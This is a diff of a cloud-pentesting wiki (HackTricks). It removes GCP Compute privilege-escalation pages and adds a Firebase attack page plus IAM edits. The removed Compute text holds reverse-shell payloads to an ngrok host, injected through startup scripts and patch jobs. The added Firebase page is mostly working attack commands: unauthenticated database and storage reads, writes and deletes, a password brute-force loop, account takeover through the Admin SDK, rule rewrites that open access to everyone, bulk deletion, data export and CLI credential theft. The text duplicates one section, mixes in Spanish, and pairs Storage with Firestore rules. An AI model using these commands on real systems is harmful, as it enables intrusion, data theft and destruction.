deleted file mode 100644 index 104bae5a6e..0000000000 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md +++ /dev/null @@ -1,151 +0,0 @@ -# GCP - Compute Privesc - -{{#include ../../../../banners/hacktricks-training.md}} - -## Compute - -For more information about Compute and VPC (netowork) in GCP check: - -{{#ref}} -../../gcp-services/gcp-compute-instances-enum/ -{{#endref}} - -> [!CAUTION] -> Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached! - -### `compute.projects.setCommonInstanceMetadata` - -With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\ -Limitations: - -- Note that GCP Service Accounts running in VM instances by default have a **very limited scope** -- You will need to be **able to contact the SSH** server to login - -For more information about how to exploit this permission check: - -{{#ref}} -gcp-add-custom-ssh-metadata.md -{{#endref}} - -You could aslo perform this attack by adding new startup-script and rebooting the instance: - -```bash -gcloud compute instances add-metadata my-vm-instance \ - --metadata startup-script='#!/bin/bash -bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &' - -gcloud compute instances reset my-vm-instance -``` - -### `compute.instances.setMetadata` - -This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations as for the previous section applies**. - -### `compute.instances.setIamPolicy` - -This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. Here is an example adding `roles/compute.admin` to a Service Account: - -```bash -export SERVER_SERVICE_ACCOUNT=YOUR_SA -export INSTANCE=YOUR_INSTANCE -export ZONE=YOUR_INSTANCE_ZONE - -cat < policy.json -bindings: -- members: - - serviceAccount:$SERVER_SERVICE_ACCOUNT - role: roles/compute.admin -version: 1 -EOF - -gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE -``` - -### **`compute.instances.osLogin`** - -If **OSLogin is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You **won't have root privs** inside the instance. - -> [!TIP] -> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM. - -### **`compute.instances.osAdminLogin`** - -If **OSLogin is enabled in the instanc**e, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have **root privs** inside the instance. - -> [!TIP] -> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM. - -### `compute.instances.create`,`iam.serviceAccounts.actAs, compute.disks.create`, `compute.instances.create`, `compute.instances.setMetadata`, `compute.instances.setServiceAccount`, `compute.subnetworks.use`, `compute.subnetworks.useExternalIp` - -It's possible to **create a virtual machine with an assigned Service Account and steal the token** of the service account accessing the metadata to escalate privileges to it. - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py). - -### `osconfig.patchDeployments.create` | `osconfig.patchJobs.exec` - -If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. - -Note that at the moment you **don't need `actAs` permission** over the SA attached to the instance. - -If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json)**.**\ -For a patch job run: - -```python -cat > /tmp/patch-job.sh <& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1 -EOF - -gsutil cp /tmp/patch-job.sh gs://readable-bucket-by-sa-in-instance/patch-job.sh - -# Get the generation number -gsutil ls -a gs://readable-bucket-by-sa-in-instance - -gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \ - --instance-filter-names=zones/us-central1-a/instances/ \ - --pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh# \ - --reboot-config=never \ - --display-name="Managed Security Update" \ - --duration=300s -``` - -To deploy a patch deployment: - -```bash -gcloud compute os-config patch-deployments create ... -``` - -The tool [patchy](https://github.com/rek7/patchy) could been used in the past for exploiting this misconfiguration (but now it's not working). - -**An attacker could also abuse this for persistence.** - -### `compute.machineImages.setIamPolicy` - -**Grant yourself extra permissions** to compute Image. - -### `compute.snapshots.setIamPolicy` - -**Grant yourself extra permissions** to a disk snapshot. - -### `compute.disks.setIamPolicy` - -**Grant yourself extra permissions** to a disk. - -### Bypass Access Scopes - -Following this link you find some [**ideas to try to bypass access scopes**](../index.html). - -### Local Privilege Escalation in GCP Compute instance - -{{#ref}} -../gcp-local-privilege-escalation-ssh-pivoting.md -{{#endref}} - -## References - -- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) - -{{#include ../../../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md deleted file mode 100644 index a68e756b51..0000000000 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md +++ /dev/null @@ -1,100 +0,0 @@ -# GCP - Add Custom SSH Metadata - -{{#include ../../../../banners/hacktricks-training.md}} - -## Modifying the metadata - -Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**. - -### **Incorporation of SSH Keys into Custom Metadata** - -On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**. - -Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host. - -### **Add SSH key to existing privileged user** - -1. **Examine Existing SSH Keys on the Instance:** - - - Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key. - - ```bash - gcloud compute instances describe [INSTANCE] --zone [ZONE] - ``` - - - Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon. - -2. **Prepare a Text File for SSH Key Metadata:** - - Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones. -3. **Generate a New SSH Key for the Target User (`alice` in this example):** - - - Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username. - - ```bash - ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub - ``` - - - Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata. - -4. **Update the Instance's SSH Key Metadata:** - - - Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command. - - ```bash - gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt - ``` - -5. **Access the Instance Using the New SSH Key:** - - - Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example). - - ```bash - ssh -i ./key alice@localhost - sudo id - ``` - -### **Create a new privileged user and add a SSH key** - -If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges: - -```bash -# define the new account username -NEWUSER="definitelynotahacker" - -# create a key -ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P "" - -# create the input meta file -NEWKEY="$(cat ./key.pub)" -echo "$NEWUSER:$NEWKEY" > ./meta.txt - -# update the instance metadata -gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt - -# ssh to the new account -ssh -i ./key "$NEWUSER"@localhost -``` - -### SSH keys at project level - -It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide: - -1. **Apply SSH Keys at the Project Level:** - - - Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled. - - ```bash - gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt - ``` - -2. **SSH into Instances Using Project-Wide Keys:** - - With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. - - A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access. - -## References - -- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) - -{{#include ../../../../banners/hacktricks-training.md}} - - diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md new file mode 100644 index 0000000000..2f80a58da3 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md @@ -0,0 +1,474 @@ +# GCP - Firebase Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Firebase + +### Unauthenticated access to Firebase Realtime Database +An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Firebase Realtime Database security rules, where the rules are set with `.read: true` or `.write: true`, allowing public read or write access. + +The attacker must identify the database URL, which typically follows the format: `https://.firebaseio.com/`. + +This URL can be found through mobile application reverse engineering (decompiling Android APKs or analyzing iOS apps), analyzing configuration files such as google-services.json (Android) or GoogleService-Info.plist (iOS), inspecting the source code of web applications, or examining network traffic to identify requests to `*.firebaseio.com` domains. + +The attacker identifies the database URL and checks whether it is publicly exposed, then accesses the data and potentially writes malicious information. + +First, they check whether the database allows read access by appending .json to the URL. + +```bash +curl https://-default-rtdb.firebaseio.com/.json +``` + +If the response contains JSON data or null (instead of "Permission Denied"), the database allows read access. To check write access, the attacker can attempt to send a test write request using the Firebase REST API. +```bash +curl -X PUT https://-default-rtdb.firebaseio.com/test.json -d '{"test": "data"}' +``` +If the operation succeeds, the database also allows write access. + + +### Exposure of data in Cloud Firestore +An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Cloud Firestore security rules where the rules allow read or write access without authentication or with insufficient validation. An example of a misconfigured rule that grants full access is: +```bash +service cloud.firestore { + match /databases/{database}/documents/{document=**} { + allow read, write: if true; + } +} +``` +This rule allows anyone to read and write all documents without any restrictions. Firestore rules are granular and apply per collection and document, so an error in a specific rule may expose only certain collections. + +The attacker must identify the Firebase Project ID, which can be found through mobile app reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspecting the source code of web applications, or analyzing network traffic to identify requests to firestore.googleapis.com. +The Firestore REST API uses the format: +```bash +https://firestore.googleapis.com/v1/projects//databases/(default)/documents// +``` + +If the rules allow unauthenticated read access, the attacker can read collections and documents. First, they attempt to access a specific collection: + +```bash +curl https://firestore.googleapis.com/v1/projects//databases/(default)/documents/ +``` + +If the response contains JSON documents instead of a permission error, the collection is exposed. The attacker can enumerate all accessible collections by trying common names or analyzing the structure of the application. To access a specific document: +```bash +curl https://firestore.googleapis.com/v1/projects//databases/(default)/documents// +``` + +If the rules allow unauthenticated write access or have insufficient validation, the attacker can create new documents: +```bash +curl -X POST https://firestore.googleapis.com/v1/projects//databases/(default)/documents/ \ + -H "Content-Type: application/json" \ + -d '{ + "fields": { + "name": {"stringValue": "Test"}, + "email": {"stringValue": "test@example.com"} + } + }' +``` + +Para modificar un documento existente se debe utilizar PATCH: +```bash +curl -X PATCH https://firestore.googleapis.com/v1/projects//databases/(default)/documents/users/ \ + -H "Content-Type: application/json" \ + -d '{ + "fields": { + "role": {"stringValue": "admin"} + } + }' +``` +Para eliminar un documento y causar denegación de servicio: +```bash +curl -X DELETE https://firestore.googleapis.com/v1/projects//databases/(default)/documents// +``` + + +### Exposure of files in Firebase Storage +An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Firebase Storage security rules where the rules allow read or write access without authentication or with insufficient validation. Storage rules control read and write permissions independently, so an error in a rule may expose read access only, write access only, or both. An example of a misconfigured rule that grants full access is: +```bash +service cloud.firestore { + match /databases/{database}/documents/{document=**} { + allow read, write: if true; + } +} +``` +This rule allows read and write access to all documents without any restrictions. Firestore rules are granular and are applied per collection and per document, so an error in a specific rule may expose only certain collections. The attacker must identify the Firebase Project ID, which can be found through mobile application reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspection of web application source code, or network traffic analysis to identify requests to firestore.googleapis.com. +The Firestore REST API uses the format:`https://firestore.googleapis.com/v1/projects//databases/(default)/documents//.` + +If the rules allow unauthenticated read access, the attacker can read collections and documents. First, they attempt to access a specific collection. +```bash +curl "https://firebasestorage.googleapis.com/v0/b//o" +curl "https://firebasestorage.googleapis.com/v0/b//o?prefix=" +``` +If the response contains the list of files instead of a permission error, the file is exposed. The attacker can view the contents of the files by specifying their path: +```bash +curl "https://firebasestorage.googleapis.com/v0/b//o/" +``` + +If the rules allow unauthenticated write access or have insufficient validation, the attacker can upload malicious files. To upload a file through the REST API: +```bash +curl -X POST "https://firebasestorage.googleapis.com/v0/b//o?name=" \ + -H "Content-Type: " \ + --data-binary @ +``` +The attacker can upload code shells, malware payloads, or large files to cause a denial of service. If the application processes or executes uploaded files, the attacker may achieve remote code execution. To delete files and cause a denial of service: +```bash +curl -X DELETE "https://firebasestorage.googleapis.com/v0/b//o/" +``` + + +### Invocation of public Firebase Cloud Functions +An attacker does not need any specific Firebase permissions to exploit this issue; it only requires that a Cloud Function is publicly accessible over HTTP without authentication. + +A function is vulnerable when it is insecurely configured: + +- It uses functions.https.onRequest, which does not enforce authentication (unlike onCall functions). +- The function’s code does not validate user authentication (e.g., no checks for request.auth or context.auth). +- The function is publicly accessible in IAM, meaning allUsers has the roles/cloudfunctions.invoker role. This is the default behavior for HTTP functions unless the developer restricts access. + +Firebase HTTP Cloud Functions are exposed through URLs such as: + +- https://-.cloudfunctions.net/ +- https://.web.app/ (when integrated with Firebase Hosting) + +An attacker can discover these URLs through source code analysis, network traffic inspection, enumeration tools, or mobile app reverse engineering. +If the function is publicly exposed and unauthenticated, the attacker can invoke it directly without credentials. + +```bash +# Invoke public HTTP function with GET +curl "https://-.cloudfunctions.net/" +# Invoke public HTTP function with POST and data +curl -X POST "https://-.cloudfunctions.net/" \ + -H "Content-Type: application/json" \ + -d '{"param1": "value1", "param2": "value2"}' +``` +If the function does not properly validate inputs, the attacker may attempt other attacks such as code injection or command injection. + + +### Brute-force attack against Firebase Authentication with a weak password policy +An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that the Firebase API Key is exposed in mobile or web applications, and that the password policy has not been configured with stricter requirements than the defaults. + +The attacker must identify the Firebase API Key, which can be found through mobile app reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspecting the source code of web applications (e.g., in bootstrap.js), or analyzing network traffic. + +Firebase Authentication’s REST API uses the endpoint: +`https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=` +to authenticate with email and password. + +If Email Enumeration Protection is disabled, API error responses can reveal whether an email exists in the system (EMAIL_NOT_FOUND vs. INVALID_PASSWORD), which allows attackers to enumerate users before attempting password guessing. When this protection is enabled, the API returns the same error message for both nonexistent emails and incorrect passwords, preventing user enumeration. + +It is important to note that Firebase Authentication enforces rate limiting, which can block requests if too many authentication attempts occur in a short time. Because of this, an attacker would have to introduce delays between attempts to avoid being rate-limited. + +The attacker identifies the API Key and performs authentication attempts with multiple passwords against known accounts. If Email Enumeration Protection is disabled, the attacker can enumerate existing users by analyzing the error responses: +```bash +# Attempt authentication with a known email and an incorrect password +curl -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=" \ + -H "Content-Type: application/json" \ + -d '{ + "email": "usuario@example.com", + "password": "password", + "returnSecureToken": true + }' +``` + +If the response contains EMAIL_NOT_FOUND, the email does not exist in the system. If it contains INVALID_PASSWORD, the email exists but the password is incorrect, confirming that the user is registered. Once a valid user is identified, the attacker can perform brute-force attempts. It is important to include pauses between attempts to avoid Firebase Authentication’s rate-limiting mechanisms: +```bash +counter=1 +for password in $(cat wordlist.txt); do + echo "Intento $counter: probando contraseña '$password'" + response=$(curl -s -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=" \ + -H "Content-Type: application/json" \ + -d "{\"email\":\"usuario@example.com\",\"password\":\"$password\",\"returnSecureToken\":true}") + + if echo "$response" | grep -q "idToken"; then + echo "Contraseña encontrada: $password (intento $counter)" + break + fi + + # Stop for the rate limiting + sleep 1 + counter=$((counter + 1)) +done +``` +With the default password policy (minimum 6 characters, no complexity requirements), the attacker can try all possible combinations of 6-character passwords, which represents a relatively small search space compared to stricter password policies. + +### User management in Firebase Authentication + +The attacker needs specific Firebase Authentication permissions to carry out this attack. The required permissions are: + +- `firebaseauth.users.create` to create users +- `firebaseauth.users.update` to modify existing users +- `firebaseauth.users.delete` to delete users +- `firebaseauth.users.get` to retrieve user information +- `firebaseauth.users.sendEmail` to send emails to users +- `firebaseauth.users.createSession` to create user sessions + +These permissions are included in the `roles/firebaseauth.admin` role, which grants full read/write access to Firebase Authentication resources. They are also included in higher-level roles such as roles/firebase.developAdmin (which includes all firebaseauth.* permissions) and roles/firebase.admin (full access to all Firebase services). + +To use the Firebase Admin SDK, the attacker would need access to service account credentials (JSON file), which might be found on compromised systems, publicly exposed code repositories, compromised CI/CD systems, or through the compromise of developer accounts that have access to these credentials. + +The first step is to configure the Firebase Admin SDK using service account credentials. +```bash +import firebase_admin +from firebase_admin import credentials, auth +cred = credentials.Certificate('path/to/serviceAccountKey.json') +firebase_admin.initialize_app(cred) +``` +To create a malicious user using a victim’s email, the attacker would attempt to use the Firebase Admin SDK to generate a new account under that email. +```bash +user = auth.create_user( + email='victima@example.com', + email_verified=False, + password='password123', + display_name='Usuario Malicioso', + disabled=False +) +print(f'Usuario creado: {user.uid}') +``` +To modify an existing user, the attacker would update fields such as the email address, verification status, or whether the account is disabled. +```bash +user = auth.update_user( + uid, + email='nuevo-email@example.com', + email_verified=True, + disabled=False +) +print(f'Usuario actualizado: {user.uid}') +``` +To delete a user account and cause a denial of service, the attacker would issue a request to remove the user entirely. +```bash +auth.delete_user(uid) +print('Usuario eliminado exitosamente') +``` +The attacker can also retrieve information about existing users by requesting their UID or email address. +```bash +user = auth.get_user(uid) +print(f'Información del usuario: {user.uid}, {user.email}') +user = auth.get_user_by_email('usuario@example.com') +print(f'Información del usuario: {user.uid}, {user.email}') +``` +Additionally, the attacker could generate verification links or password-reset links in order to change a user’s password and gain access to their account. +```bash +link = auth.generate_email_verification_link(email) +print(f'Link de verificación: {link}') +link = auth.generate_password_reset_link(email) +print(f'Link de reset: {link}') +``` + +### User management in Firebase Authentication +An attacker needs specific Firebase Authentication permissions to carry out this attack. The required permissions are: + +- `firebaseauth.users.create` to create users +- `firebaseauth.users.update` to modify existing users +- `firebaseauth.users.delete` to delete users +- `firebaseauth.users.get` to obtain user information +- `firebaseauth.users.sendEmail` to send emails to users +- `firebaseauth.users.createSession` to create user sessions + +These permissions are included in the roles/firebaseauth.admin role, which grants full read/write access to Firebase Authentication resources. They are also part of higher-level roles such as `roles/firebase.developAdmin` (which includes all firebaseauth.* permissions) and `roles/firebase.admin` (full access to all Firebase services). + +To use the Firebase Admin SDK, the attacker would need access to service account credentials (a JSON file), which could be obtained from compromised systems, publicly exposed code repositories, compromised CI/CD environments, or through the compromise of developer accounts that have access to these credentials. + +The first step is to configure the Firebase Admin SDK using service account credentials. +```bash +import firebase_admin +from firebase_admin import credentials, auth +cred = credentials.Certificate('path/to/serviceAccountKey.json') +firebase_admin.initialize_app(cred) +``` +To create a malicious user using a victim’s email, the attacker would attempt to create a new user account with that email, assigning their own password and profile information. +```bash +user = auth.create_user( + email='victima@example.com', + email_verified=False, + password='password123', + display_name='Usuario Malicioso', + disabled=False +) +print(f'Usuario creado: {user.uid}') +``` +To modify an existing user, the attacker would change fields such as the email address, verification status, or whether the account is disabled. +```bash +user = auth.update_user( + uid, + email='nuevo-email@example.com', + email_verified=True, + disabled=False +) +print(f'Usuario actualizado: {user.uid}') +``` +To delete a user account—effectively causing a denial of service—the attacker would issue a request to remove that user permanently. +```bash +auth.delete_user(uid) +print('Usuario eliminado exitosamente') +``` +The attacker could also retrieve information about existing users, such as their UID or email, by requesting user details either by UID or by email address. +```bash +user = auth.get_user(uid) +print(f'Información del usuario: {user.uid}, {user.email}') +user = auth.get_user_by_email('usuario@example.com') +print(f'Información del usuario: {user.uid}, {user.email}') +``` +Additionally, the attacker could generate verification links or password-reset links, enabling them to change the password of a user and take control of the account. +```bash +link = auth.generate_email_verification_link(email) +print(f'Link de verificación: {link}') +link = auth.generate_password_reset_link(email) +print(f'Link de reset: {link}') +``` + +### Modification of security rules in Firebase services +The attacker needs specific permissions to modify security rules depending on the service. For Cloud Firestore and Firebase Cloud Storage, the required permissions are `firebaserules.rulesets.create` to create rulesets and `firebaserules.releases.create` to deploy releases. These permissions are included in the `roles/firebaserules.admin` role or in higher-level roles such as `roles/firebase.developAdmin` and `roles/firebase.admin`. For Firebase Realtime Database, the required permission is `firebasedatabase.instances.update`. + +The attacker must use the Firebase REST API to modify the security rules. +First, the attacker would need to obtain an access token using service account credentials. +To obtain the token: +```bash +gcloud auth activate-service-account --key-file=path/to/serviceAccountKey.json +ACCESS_TOKEN=$(gcloud auth print-access-token) +``` + +To modify Firebase Realtime Database rules: +```bash +curl -X PUT "https://-default-rtdb.firebaseio.com/.settings/rules.json?access_token=$ACCESS_TOKEN" \ + -H "Content-Type: application/json" \ + -d '{ + "rules": { + ".read": true, + ".write": true + } + }' +``` +To modify Cloud Firestore rules, the attacker must create a ruleset and then deploy it: +```bash +curl -X POST "https://firebaserules.googleapis.com/v1/projects//rulesets" \ + -H "Authorization: Bearer $ACCESS_TOKEN" \ + -H "Content-Type: application/json" \ + -d '{ + "source": { + "files": [{ + "name": "firestore.rules", + "content": "rules_version = '\''2'\'';\nservice cloud.firestore {\n match /databases/{database}/documents {\n match /{document=**} {\n allow read, write: if true;\n }\n }\n}" + }] + } + }' +``` +The previous command returns a ruleset name in the format projects//rulesets/. To deploy the new version, the release must be updated using a PATCH request: +```bash +curl -X PATCH "https://firebaserules.googleapis.com/v1/projects//releases/cloud.firestore" \ + -H "Authorization: Bearer $ACCESS_TOKEN" \ + -H "Content-Type: application/json" \ + -d '{ + "release": { + "name": "projects//releases/cloud.firestore", + "rulesetName": "projects//rulesets/" + } + }' +``` +To modify Firebase Cloud Storage rules: +```bash +curl -X POST "https://firebaserules.googleapis.com/v1/projects//rulesets" \ + -H "Authorization: Bearer $ACCESS_TOKEN" \ + -H "Content-Type: application/json" \ + -d '{ + "source": { + "files": [{ + "name": "storage.rules", + "content": "service firebase.storage {\n match /b/{bucket}/o {\n match /{allPaths=**} {\n allow read, write: if true;\n }\n }\n}" + }] + } + }' +``` +The previous command returns a ruleset name in the format projects//rulesets/. To deploy the new version, the release must be updated using a PATCH request: +```bash +curl -X PATCH "https://firebaserules.googleapis.com/v1/projects//releases/firebase.storage/" \ + -H "Authorization: Bearer $ACCESS_TOKEN" \ + -H "Content-Type: application/json" \ + -d '{ + "release": { + "name": "projects//releases/firebase.storage/", + "rulesetName": "projects//rulesets/" + } + }' +``` + +### Data exfiltration and manipulation in Cloud Firestore +Cloud Firestore uses the same infrastructure and permission system as Cloud Datastore, so Datastore IAM permissions apply directly to Firestore. To manipulate TTL policies, the `datastore.indexes.update` permission is required. To export data, the `datastore.databases.export` permission is required. To import data, the datastore.databases.import permission is required. To perform bulk data deletion, the `datastore.databases.bulkDelete` permission is required. + +For backup and restore operations, specific permissions are needed: + +- `datastore.backups.get` and `datastore.backups.list` to list and retrieve details of available backups +- `datastore.backups.delete` to delete backups +- `datastore.backups.restoreDatabase` to restore a database from a backup +- `datastore.backupSchedules.create` and `datastore.backupSchedules.delete` to manage backup schedules + +When a TTL policy is created, a designated property is selected to identify entities that are eligible for deletion. This TTL property must be of the Date and time type. The attacker can choose a property that already exists or designate a property that they plan to add later. If the value of the field is a date in the past, the document becomes eligible for immediate deletion. The attacker can use the gcloud CLI to manipulate TTL policies. +```bash +# Enable TTL +gcloud firestore fields ttls update expireAt \ + --collection-group=users \ + --enable-ttl +# Disable TTL +gcloud firestore fields ttls update expireAt \ + --collection-group=users \ + --disable-ttl +``` +To export data and exfiltrate it, the attacker could use the gcloud CLI. +```bash +gcloud firestore export gs:// --project= --async --database='(default)' +``` + +To import malicious data: +```bash +gcloud firestore import gs:/// --project= --async --database='(default)' +``` + +To perform mass data deletion and cause a denial of service, the attacker could use the gcloud Firestore bulk-delete tool to remove entire collections. +```bash +gcloud firestore bulk-delete \ + --collection-ids=users,posts,messages \ + --database='(default)' \ + --project= +``` +For backup and restoration operations, the attacker could create scheduled backups to capture the current state of the database, list existing backups, restore from a backup to overwrite recent changes, delete backups to cause permanent data loss, and remove scheduled backups. +To create a daily backup schedule that immediately generates a backup: +```bash +gcloud firestore backups schedules create \ + --database='(default)' \ + --recurrence=daily \ + --retention=14w \ + --project= +``` +To restore from a specific backup, the attacker could create a new database using the data contained in that backup. The restore operation writes the backup’s data into a new database, meaning that an existing DATABASE_ID cannot be used. +```bash +gcloud firestore databases restore \ + --source-backup=projects//locations//backups/ \ + --destination-database='' \ + --project= +``` +To delete a backup and cause permanent data loss: +```bash +gcloud firestore backups delete \ + --backup= \ + --project= +``` + +### Theft and misuse of Firebase CLI credentials +An attacker does not need specific Firebase permissions to carry out this attack, but they do need access to the developer’s local system or to the Firebase CLI credentials file. These credentials are stored in a JSON file located at: + +- Linux/macOS: ~/.config/configstore/firebase-tools.json + +- Windows: C:\Users\[User]\.config\configstore\firebase-tools.json + +This file contains authentication tokens, including the refresh_token and access_token, which allow the attacker to authenticate as the user who originally ran firebase login. + +The attacker gains access to the Firebase CLI credentials file. They can then copy the entire file to their own system, and the Firebase CLI will automatically use the credentials from its default location. After doing so, the attacker can view all Firebase projects accessible to that user. +```bash +firebase projects:list +``` +## References + +- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) + +{{#include ../../../banners/hacktricks-training.md}} + + + diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md index 6e88dd06a4..4db52eda6c 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md @@ -14,45 +14,48 @@ Find more information about IAM in: An attacker with the mentioned permissions will be able to update a role assigned to you and give you extra permissions to other resources like: -
Update IAM role to add permissions - ```bash gcloud iam roles update --project --add-permissions ``` -
- You can find a script to automate the **creation, exploit and cleaning of a vuln environment here** and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). +```bash +gcloud iam roles update --project --add-permissions +``` + +### `iam.roles.create` & `iam.serviceAccounts.setIamPolicy` +The iam.roles.create permission allows the creation of custom roles in a project/organization. In the hands of an attacker, this is dangerous because it enables them to define new sets of permissions that can later be assigned to entities (for example, using the iam.serviceAccounts.setIamPolicy permission) with the goal of escalating privileges. + +```bash +gcloud iam roles create \ + --project= \ + --title="" \ + --description="<Description>" \ + --permissions="permission1,permission2,permission3" +``` + ### `iam.serviceAccounts.getAccessToken` (`iam.serviceAccounts.get`) An attacker with the mentioned permissions will be able to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours. -<details><summary>Impersonate service account to get access token</summary> - ```bash gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" \ auth print-access-token ``` -</details> - You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). ### `iam.serviceAccountKeys.create` An attacker with the mentioned permissions will be able to **create a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account. -<details><summary>Create service account key and authenticate</summary> - ```bash gcloud iam service-accounts keys create --iam-account <name> /tmp/key.json gcloud auth activate-service-account --key-file=sa_cred.json ``` -</details> - You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh) and a python script to abuse this privilege 